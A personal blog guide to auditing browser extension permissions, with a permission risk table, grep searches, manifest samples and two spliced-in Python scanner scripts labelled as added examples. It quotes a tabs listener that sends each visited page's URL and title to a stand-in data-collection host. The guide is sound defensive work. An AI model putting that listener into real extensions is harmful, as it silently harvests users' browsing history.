
How to Audit Browser Extension Permissions for Privacy Risks

I discovered my password manager extension had been running a background service worker 24/7, and I had no idea what it was doing. That “On all sites” permission I’d blindly approved? It meant the extension could read everything on every webpage I visited—including my banking sessions, email, and private ChatGPT conversations.

If you’re like me, you’ve installed dozens of browser extensions over the years without thinking twice. The scary truth: some of them are collecting and selling your data. Here’s how I audited every extension on my system and what I found.

The Wake-Up Call

A Reddit thread caught my attention: users discovered extensions that read their ChatGPT conversations and sold the data to advertisers. One person found an extension injecting ads by monitoring everything they typed.

I decided to audit my own extensions. What I found made me immediately remove half of them.

Step 1: Check What Extensions Can Access

Chrome: The Site Access Problem

I started with Chrome’s extension settings:

  1. Navigate to chrome://extensions
  2. Enable “Developer mode” (top right toggle)
  3. Click “Details” on each extension
  4. Look for “Site access” setting

The most dangerous setting is “On all sites.” This means the extension can read, modify, and track everything you do online.

Site access options ranked by risk
CRITICAL: On all sites <- Can access EVERY website
HIGH: On specific sites <- Limited to certain domains
LOW: On click <- Only active when you click it

I found 7 of my 12 extensions had “On all sites” access. For a dark mode extension, that makes sense. But why did my screenshot tool need access to my banking page?

Firefox: Similar Problems

Firefox users have it slightly better:

  1. Open about:addons
  2. Click on any extension
  3. Check the “Permissions” tab

Firefox shows you what data the extension collects, but the same risks apply.

Step 2: Find the Dangerous Permissions

I learned there’s a hierarchy of dangerous permissions. Here’s what I now check for:

Permission risk levels (from my audit)
CRITICAL:
- <all_urls> <- Access to EVERY website
- *://*/* <- Same thing, different syntax
- webRequest <- Can intercept ALL network requests
- clipboardRead <- Can read passwords you copy
HIGH:
- tabs <- See which sites you visit
- history <- Access entire browsing history
- cookies <- Access session cookies, auth tokens
- clipboardWrite <- Can modify clipboard contents
MEDIUM:
- bookmarks <- Read all your bookmarks
- identity <- Sign-in with Google/Facebook
LOW:
- storage <- Store data locally (usually fine)
- activeTab <- Only current tab when clicked

The clipboardRead permission is particularly scary. If an extension can read your clipboard, it can grab passwords you copy from your password manager.

Step 3: Inspect Background Activity

This was eye-opening. Chrome extensions can run background processes even when you’re not using them.

  1. Open chrome://service-workers
  2. See which extensions have active background processes
  3. Check network activity in real-time

I found two extensions making network requests to servers I didn’t recognize, every few minutes, even when I wasn’t actively using them.

What I saw in service workers
Extension A: Polling analytics.example.com every 60 seconds
Extension B: Unknown POST requests to tracking.pixel.net
Extension C: Idle (good)
Extension D: Sending data to api.shopping-tracker.com

Two of my extensions were constantly phoning home. I removed them immediately.

Step 4: Audit the Source Code Directly

Here’s what most people don’t realize: extension source code is stored locally as plain text JavaScript. You can read it yourself.

Finding Extension Files

Chrome on macOS:

cd ~/Library/Application\ Support/Google/Chrome/Default/Extensions/
ls -la

Chrome on Windows:

%LOCALAPPDATA%\Google\Chrome\User Data\Default\Extensions\

Chrome on Linux:

~/.config/google-chrome/Default/Extensions/

Each extension has its own folder, named by its extension ID.

What to Look For

Once you find the extension folder, open manifest.json first:

grep -A 30 '"permissions"' manifest.json
grep -A 10 '"host_permissions"' manifest.json

Then search for suspicious patterns in the JavaScript files:

# Find external network calls
grep -r "fetch(" . --include="*.js"
grep -r "XMLHttpRequest" . --include="*.js"
# Find analytics/tracking
grep -r "analytics" . --include="*.js"
grep -r "telemetry" . --include="*.js"
grep -r "tracking" . --include="*.js"
# Find external URLs
grep -r "https://" . --include="*.js" | grep -v ".map"
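The greps above answer one question at a time. The script below is an added example (my own, not the article's or any extension's code) that does the same scan in one pass over an extension folder: it pulls every URL out of the JavaScript, reduces it to a hostname, records which network APIs and which browsing-data APIs are used, and flags the combination that Step 4 describes (reading tab or history data plus calling out to a server). The regular expressions and the "phones home" heuristic are my assumptions; the embedded sample source is the snippet from the next section, constructed here so the script runs offline.

```python
import re
from pathlib import Path
from urllib.parse import urlparse

# Assumed patterns: a URL literal, the browser's outbound network APIs, and the
# extension APIs that expose browsing data (mirrors the permission table above).
URL_RE = re.compile(r"""https?://[^\s"'`<>)]+""")
NETWORK_API_RE = re.compile(r"\b(fetch|XMLHttpRequest|WebSocket|sendBeacon)\b")
BROWSER_DATA_RE = re.compile(r"\b(?:chrome|browser)\.(tabs|history|cookies|webRequest|bookmarks)\b")


def scan_source(text):
    """Summarise one JavaScript file: external hosts, network APIs, data APIs."""
    hosts = set()
    for url in URL_RE.findall(text):
        host = urlparse(url).hostname
        if host:
            hosts.add(host)
    network_apis = set(NETWORK_API_RE.findall(text))
    data_apis = set(BROWSER_DATA_RE.findall(text))
    return {
        "hosts": sorted(hosts),
        "network_apis": sorted(network_apis),
        "data_apis": sorted(data_apis),
        # Heuristic (assumption): browsing data is read AND something is sent out.
        "phones_home": bool(hosts) and bool(network_apis) and bool(data_apis),
    }


def scan_extension_dir(root):
    """Merge scan_source() results over every .js file under root (skips .js.map files)."""
    merged = {"hosts": set(), "network_apis": set(), "data_apis": set(), "files": 0}
    for path in Path(root).rglob("*.js"):
        result = scan_source(path.read_text(encoding="utf-8", errors="ignore"))
        merged["files"] += 1
        for key in ("hosts", "network_apis", "data_apis"):
            merged[key].update(result[key])
    merged["phones_home"] = bool(merged["hosts"] and merged["network_apis"] and merged["data_apis"])
    return {k: (sorted(v) if isinstance(v, set) else v) for k, v in merged.items()}


# Constructed sample: the listener quoted in the article, not read from disk.
SAMPLE_SOURCE = """
chrome.tabs.onUpdated.addListener((tabId, changeInfo, tab) => {
  if (changeInfo.status === 'complete') {
    fetch('https://datacollector.example.com/collect', {
      method: 'POST',
      body: JSON.stringify({ url: tab.url, title: tab.title, timestamp: Date.now() })
    });
  }
});
"""

if __name__ == "__main__":
    import sys
    report = scan_extension_dir(sys.argv[1]) if len(sys.argv) > 1 else scan_source(SAMPLE_SOURCE)
    for key, value in report.items():
        print(f"{key}: {value}")
```

Run it with the extension's folder as the argument (`python scan.py <extension-folder>`); a bundled or minified extension will list many hosts from third-party libraries, so treat the host list as the set of domains you now have to explain, not as proof of wrongdoing, and read the surrounding code for any host you do not recognise.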

What I Found in My Audit

One extension I’d trusted for years had this in its code:

Suspicious code I found
// The extension was sending data to a third-party server
chrome.tabs.onUpdated.addListener((tabId, changeInfo, tab) => {
  if (changeInfo.status === 'complete') {
    fetch('https://datacollector.example.com/collect', {
      method: 'POST',
      body: JSON.stringify({
        url: tab.url,
        title: tab.title,
        timestamp: Date.now()
      })
    });
  }
});

Every page I visited was being sent to an external server. I had no idea.

Step 5: The Manifest Analysis

The manifest.json file tells you exactly what an extension can do. Here’s what I now look for:

Dangerous configuration:

manifest.json - HIGH RISK
{
  "manifest_version": 3,
  "name": "Suspicious Extension",
  "permissions": [
    "tabs",
    "clipboardRead",
    "history",
    "webRequest"
  ],
  "host_permissions": [
    "<all_urls>"
  ],
  "content_scripts": [
    {
      "matches": ["<all_urls>"],
      "js": ["content.js"]
    }
  ]
}

This extension can: read every site, access clipboard, see browsing history, intercept network requests, and inject scripts on every page.

Safer configuration:

manifest.json - LOWER RISK
{
  "manifest_version": 3,
  "name": "Minimal Permission Extension",
  "permissions": [
    "activeTab",
    "storage"
  ],
  "host_permissions": [
    "https://specific-site.com/*"
  ]
}

This only accesses the current tab when clicked and only communicates with one specific site.
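Putting the permission table from Step 2 and the manifest reading from Step 5 together, here is an added example (my own script, not the article's) that rates a manifest.json the way the article does by hand: each permission, host pattern and content-script match gets the level from the table, and the overall rating is the worst finding. Treating the scheme-specific catch-alls "http://*/*" and "https://*/*" as "all sites" is my assumption; the two manifests from the article are embedded so the script runs without a browser profile.

```python
import json
import sys

# Ratings copied from the article's permission table; unrated permissions are
# reported nowhere rather than silently scored.
PERMISSION_RISK = {
    "<all_urls>": "CRITICAL", "*://*/*": "CRITICAL",
    "webRequest": "CRITICAL", "clipboardRead": "CRITICAL",
    "tabs": "HIGH", "history": "HIGH", "cookies": "HIGH", "clipboardWrite": "HIGH",
    "bookmarks": "MEDIUM", "identity": "MEDIUM",
    "storage": "LOW", "activeTab": "LOW",
}
# Assumption: scheme-specific catch-all patterns grant the same reach as <all_urls>.
ALL_SITES = {"<all_urls>", "*://*/*", "http://*/*", "https://*/*"}
ORDER = {"LOW": 0, "MEDIUM": 1, "HIGH": 2, "CRITICAL": 3}


def rate_host_pattern(pattern):
    """Map a match pattern onto the article's site-access ranking."""
    return "CRITICAL" if pattern in ALL_SITES else "HIGH"  # "On all sites" vs "On specific sites"


def analyze_manifest(manifest):
    """Return (overall_level, findings) for a parsed manifest.json dictionary.

    findings is a list of (level, description) sorted worst-first and
    overall_level is the level of the worst finding ("LOW" if there are none).
    """
    findings = []
    # Manifest V2 lists host patterns under "permissions"; V3 uses "host_permissions".
    for perm in manifest.get("permissions", []):
        level = "CRITICAL" if perm in ALL_SITES else PERMISSION_RISK.get(perm)
        if level:
            findings.append((level, f"permission {perm}"))
    for pattern in manifest.get("host_permissions", []):
        findings.append((rate_host_pattern(pattern), f"host access {pattern}"))
    # A content script runs inside the page, so its match list is a site-access grant too.
    for script in manifest.get("content_scripts", []):
        for pattern in script.get("matches", []):
            findings.append((rate_host_pattern(pattern), f"content script injected on {pattern}"))
    findings.sort(key=lambda f: ORDER[f[0]], reverse=True)
    overall = findings[0][0] if findings else "LOW"
    return overall, findings


# The two manifests shown in the article, embedded as constructed sample input.
HIGH_RISK_MANIFEST = {
    "manifest_version": 3, "name": "Suspicious Extension",
    "permissions": ["tabs", "clipboardRead", "history", "webRequest"],
    "host_permissions": ["<all_urls>"],
    "content_scripts": [{"matches": ["<all_urls>"], "js": ["content.js"]}],
}
LOWER_RISK_MANIFEST = {
    "manifest_version": 3, "name": "Minimal Permission Extension",
    "permissions": ["activeTab", "storage"],
    "host_permissions": ["https://specific-site.com/*"],
}


def main(argv):
    """Rate the manifest at argv[1], or the article's high-risk sample if no path is given."""
    if len(argv) > 1:
        with open(argv[1], encoding="utf-8") as fh:
            manifest = json.load(fh)
    else:
        manifest = HIGH_RISK_MANIFEST
    overall, findings = analyze_manifest(manifest)
    print(f"overall risk: {overall}")
    for level, description in findings:
        print(f"  {level:8} {description}")


if __name__ == "__main__":
    main(sys.argv)
```

Note that the "lower risk" manifest still rates HIGH, because the table ranks any "On specific sites" grant as HIGH; the point of the score is to order your extensions for review, and the rating of the high-risk sample (CRITICAL on four separate findings) is what tells you to read that one's code first.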

Step 6: Open Source vs Closed Source

I learned something important: open source extensions are easier to trust.

Dark Reader is a perfect example. It has <all_urls> permission, which sounds scary. But it’s open source—anyone can verify the code isn’t doing anything malicious. The code matches what’s published on GitHub.

Closed source extensions? You have to trust the developer’s privacy policy, which can change when the company gets acquired.

How to verify open source claims:

  1. Check the extension page for a GitHub link
  2. Download the published extension
  3. Compare the code with the GitHub repository
  4. Look for security audits or community reviews

My 5-Minute Audit Checklist

After all this research, I created a quick checklist for auditing any extension:

  • Check site access (prefer “On click” or specific sites)
  • Review requested permissions in details
  • Check if background service worker is running (chrome://service-workers)
  • Look for open source repository
  • Search for recent security reports
  • Check last update date (abandoned = risky)
  • Review number of users (very low = suspicious)
  • Read reviews for privacy complaints

The Results of My Audit

Out of 12 extensions:

  • Removed 6 immediately - unnecessary permissions, suspicious code, or abandoned
  • Changed 4 to “On click” access - limited when they can access my data
  • Kept 2 with full access - open source, verified, and essential

The extensions I removed included two shopping helpers, a PDF converter, and a “speed booster” that was actually collecting browsing data.

Why This Matters

Your browsing data has value. Companies pay for information about what you search for, what you buy, what you read. Extensions with broad permissions can harvest this data and sell it.

Even legitimate-seeming extensions can turn malicious. A 2024 study found that 30% of Chrome extensions with over 1,000 users had privacy issues. Some start clean, then add tracking code after they have a user base.

The Trade-Offs

I’m not suggesting you remove all extensions. Some are genuinely useful. But consider:

Worth the risk (with verification):

  • Password managers (verify they’re reputable, check permissions)
  • Essential developer tools (check if open source)
  • Productivity tools from major companies

Usually unnecessary risk:

  • Shopping helpers (often just data collectors)
  • “Speed boosters” (rarely effective, often trackers)
  • PDF converters (use web services or desktop apps instead)
  • Ad blockers from unknown developers

Key Takeaways

  1. “On all sites” is the biggest red flag - limit extensions to specific sites or “on click”
  2. Source code is stored locally - you can always audit it yourself
  3. Open source extensions are easier to trust - claims can be verified by anyone
  4. Check chrome://service-workers - see what’s running in the background
  5. Clipboard, history, and cookie permissions are sensitive - think twice before granting
  6. Abandoned extensions are security risks - no security updates means vulnerabilities

The Reddit discussion about extensions reading ChatGPT conversations and selling the data isn’t theoretical. It’s happening. Take 10 minutes to audit your extensions. Remove what you don’t need. Limit what you keep. Your browsing data is worth protecting.

Final Words + More Resources

My intention with this article was to share my knowledge and experience to help others. If you want to contact me, you can reach me by email.
